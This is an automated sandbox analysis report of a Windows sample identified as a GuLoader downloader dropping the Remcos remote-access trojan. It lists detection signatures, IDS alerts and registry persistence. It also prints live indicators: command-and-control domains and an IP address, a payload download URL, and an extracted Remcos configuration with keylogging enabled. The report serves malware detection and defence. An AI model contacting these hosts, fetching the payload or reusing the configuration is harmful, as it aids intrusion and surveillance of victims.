Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMG635673567357735773573757875883587935775753Bjlkeloftet.exe

Overview

General Information

Sample name:IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
Analysis ID:1554912
MD5:a03dcb82d6ecaab34cc6ae971a806c06
SHA1:3bf367387ad278b154bd2af42e7bedf0f8676f6c
SHA256:4fc786009ad36ded81dfbd863802b06436b718112c35a505d447f6e0d31cbf8d
Tags:exeGuLoaderuser-sdf
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Installs a global keyboard hook
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["odumegwu.duckdns.org:51525:1", "odumeje1.duckdns.org:51525:0", "odumeje.duckdns.org:51525:1"], "Assigned name": "LoneWolf", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3DX9QW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000000.00000002.2056638671.000000000433E000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 1 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, ProcessId: 1076, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, ProcessId: 1076, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, ProcessId: 1076, TargetFilename: C:\ProgramData\remcos\logs.dat

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-13T08:18:17.236404+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449730TCP
              2024-11-13T08:18:56.325500+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449738TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-13T08:19:03.195468+010020365941Malware Command and Control Activity Detected192.168.2.449755192.169.69.2651525TCP
              2024-11-13T08:19:04.926316+010020365941Malware Command and Control Activity Detected192.168.2.449765192.169.69.2651525TCP
              2024-11-13T08:19:06.827743+010020365941Malware Command and Control Activity Detected192.168.2.449776192.169.69.2651525TCP
              2024-11-13T08:19:08.401107+010020365941Malware Command and Control Activity Detected192.168.2.449784192.169.69.2651525TCP
              2024-11-13T08:19:10.382922+010020365941Malware Command and Control Activity Detected192.168.2.449799192.169.69.2651525TCP
              2024-11-13T08:19:11.936170+010020365941Malware Command and Control Activity Detected192.168.2.449810192.169.69.2651525TCP
              2024-11-13T08:19:13.772123+010020365941Malware Command and Control Activity Detected192.168.2.449822192.169.69.2651525TCP
              2024-11-13T08:19:15.349074+010020365941Malware Command and Control Activity Detected192.168.2.449830192.169.69.2651525TCP
              2024-11-13T08:19:17.218929+010020365941Malware Command and Control Activity Detected192.168.2.449842192.169.69.2651525TCP
              2024-11-13T08:19:18.829600+010020365941Malware Command and Control Activity Detected192.168.2.449853192.169.69.2651525TCP
              2024-11-13T08:19:20.612797+010020365941Malware Command and Control Activity Detected192.168.2.449865192.169.69.2651525TCP
              2024-11-13T08:19:22.253068+010020365941Malware Command and Control Activity Detected192.168.2.449876192.169.69.2651525TCP
              2024-11-13T08:19:24.028266+010020365941Malware Command and Control Activity Detected192.168.2.449887192.169.69.2651525TCP
              2024-11-13T08:19:25.653490+010020365941Malware Command and Control Activity Detected192.168.2.449899192.169.69.2651525TCP
              2024-11-13T08:19:27.445484+010020365941Malware Command and Control Activity Detected192.168.2.449910192.169.69.2651525TCP
              2024-11-13T08:19:29.114785+010020365941Malware Command and Control Activity Detected192.168.2.449922192.169.69.2651525TCP
              2024-11-13T08:19:30.896084+010020365941Malware Command and Control Activity Detected192.168.2.449933192.169.69.2651525TCP
              2024-11-13T08:19:32.578941+010020365941Malware Command and Control Activity Detected192.168.2.449944192.169.69.2651525TCP
              2024-11-13T08:19:34.374861+010020365941Malware Command and Control Activity Detected192.168.2.449956192.169.69.2651525TCP
              2024-11-13T08:19:36.035665+010020365941Malware Command and Control Activity Detected192.168.2.449966192.169.69.2651525TCP
              2024-11-13T08:19:38.188926+010020365941Malware Command and Control Activity Detected192.168.2.449978192.169.69.2651525TCP
              2024-11-13T08:19:39.949409+010020365941Malware Command and Control Activity Detected192.168.2.449991192.169.69.2651525TCP
              2024-11-13T08:19:41.813064+010020365941Malware Command and Control Activity Detected192.168.2.450001192.169.69.2651525TCP
              2024-11-13T08:19:43.467073+010020365941Malware Command and Control Activity Detected192.168.2.450011192.169.69.2651525TCP
              2024-11-13T08:19:45.250177+010020365941Malware Command and Control Activity Detected192.168.2.450022192.169.69.2651525TCP
              2024-11-13T08:19:46.795133+010020365941Malware Command and Control Activity Detected192.168.2.450033192.169.69.2651525TCP
              2024-11-13T08:19:48.651600+010020365941Malware Command and Control Activity Detected192.168.2.450043192.169.69.2651525TCP
              2024-11-13T08:19:50.222483+010020365941Malware Command and Control Activity Detected192.168.2.450045192.169.69.2651525TCP
              2024-11-13T08:19:52.106671+010020365941Malware Command and Control Activity Detected192.168.2.450046192.169.69.2651525TCP
              2024-11-13T08:19:53.685122+010020365941Malware Command and Control Activity Detected192.168.2.450048192.169.69.2651525TCP
              2024-11-13T08:19:55.544309+010020365941Malware Command and Control Activity Detected192.168.2.450049192.169.69.2651525TCP
              2024-11-13T08:19:57.283983+010020365941Malware Command and Control Activity Detected192.168.2.450051192.169.69.2651525TCP
              2024-11-13T08:19:59.104861+010020365941Malware Command and Control Activity Detected192.168.2.450052192.169.69.2651525TCP
              2024-11-13T08:20:00.760644+010020365941Malware Command and Control Activity Detected192.168.2.450054192.169.69.2651525TCP
              2024-11-13T08:20:02.576299+010020365941Malware Command and Control Activity Detected192.168.2.450055192.169.69.2651525TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-13T08:19:03.345502+010020327761Malware Command and Control Activity Detected192.168.2.449760192.169.69.2651525TCP
              2024-11-13T08:19:06.835426+010020327761Malware Command and Control Activity Detected192.168.2.449782192.169.69.2651525TCP
              2024-11-13T08:19:10.391282+010020327761Malware Command and Control Activity Detected192.168.2.449805192.169.69.2651525TCP
              2024-11-13T08:19:13.781011+010020327761Malware Command and Control Activity Detected192.168.2.449825192.169.69.2651525TCP
              2024-11-13T08:19:17.226763+010020327761Malware Command and Control Activity Detected192.168.2.449847192.169.69.2651525TCP
              2024-11-13T08:19:20.620211+010020327761Malware Command and Control Activity Detected192.168.2.449870192.169.69.2651525TCP
              2024-11-13T08:19:24.036167+010020327761Malware Command and Control Activity Detected192.168.2.449893192.169.69.2651525TCP
              2024-11-13T08:19:27.454454+010020327761Malware Command and Control Activity Detected192.168.2.449916192.169.69.2651525TCP
              2024-11-13T08:19:30.903882+010020327761Malware Command and Control Activity Detected192.168.2.449938192.169.69.2651525TCP
              2024-11-13T08:19:34.382169+010020327761Malware Command and Control Activity Detected192.168.2.449961192.169.69.2651525TCP
              2024-11-13T08:19:38.196639+010020327761Malware Command and Control Activity Detected192.168.2.449985192.169.69.2651525TCP
              2024-11-13T08:19:41.820131+010020327761Malware Command and Control Activity Detected192.168.2.450006192.169.69.2651525TCP
              2024-11-13T08:19:45.257645+010020327761Malware Command and Control Activity Detected192.168.2.450028192.169.69.2651525TCP
              2024-11-13T08:19:48.660482+010020327761Malware Command and Control Activity Detected192.168.2.450044192.169.69.2651525TCP
              2024-11-13T08:19:52.115382+010020327761Malware Command and Control Activity Detected192.168.2.450047192.169.69.2651525TCP
              2024-11-13T08:19:55.552303+010020327761Malware Command and Control Activity Detected192.168.2.450050192.169.69.2651525TCP
              2024-11-13T08:19:59.112616+010020327761Malware Command and Control Activity Detected192.168.2.450053192.169.69.2651525TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-13T08:18:54.017024+010028032702Potentially Bad Traffic192.168.2.44973691.196.125.12580TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exeAvira: detection malicious, Label: HEUR/AGEN.1337950
              Found malware configuration
              Source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["odumegwu.duckdns.org:51525:1", "odumeje1.duckdns.org:51525:0", "odumeje.duckdns.org:51525:1"], "Assigned name": "LoneWolf", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3DX9QW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exeReversingLabs: Detection: 28%
              Multi AV Scanner detection for submitted file
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exeReversingLabs: Detection: 28%
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exeVirustotal: Detection: 16%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe PID: 1076, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 91.196.125.125:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 4_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405A4F
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 4_2_00406620 FindFirstFileA,FindClose,4_2_00406620
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeCode function: 4_2_004027CF FindFirstFileA,4_2_004027CF

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49760 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49755 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49765 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49782 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49776 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49784 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49799 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49810 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49822 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49830 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49842 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49805 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49853 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49847 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49825 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49865 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49870 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49887 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49876 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49893 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49910 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49916 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49922 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49938 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49944 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49899 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49933 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49961 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49956 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49966 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49985 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49978 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50001 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50006 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49991 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50022 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50028 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50011 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50033 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50051 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50046 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50055 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50047 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50045 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50050 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50048 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50049 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50043 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50053 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50052 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50054 -> 192.169.69.26:51525
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50044 -> 192.169.69.26:51525
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: odumegwu.duckdns.org
              Source: Malware configuration extractorURLs: odumeje1.duckdns.org
              Source: Malware configuration extractorURLs: odumeje.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: odumeje.duckdns.org
              Source: unknownDNS query: name: odumegwu.duckdns.org
              Source: unknownDNS query: name: odumeje1.duckdns.org
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 91.196.125.125:80
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49730
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49738
              Source: global trafficHTTP traffic detected: GET /zjMSeQNkb41.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: bdias.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /zjMSeQNkb41.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: bdias.comCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /zjMSeQNkb41.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: bdias.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /zjMSeQNkb41.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: bdias.comCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: bdias.com
              Source: global trafficDNS traffic detected: DNS query: odumegwu.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: odumeje1.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: odumeje.duckdns.org
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890757573.0000000006B60000.00000004.00001000.00020000.00000000.sdmp, IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bdias.com/zjMSeQNkb41.bin
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bdias.com/zjMSeQNkb41.bine
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bdias.com/zjMSeQNkb41.binj
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bdias.com/zjMSeQNkb41.binm
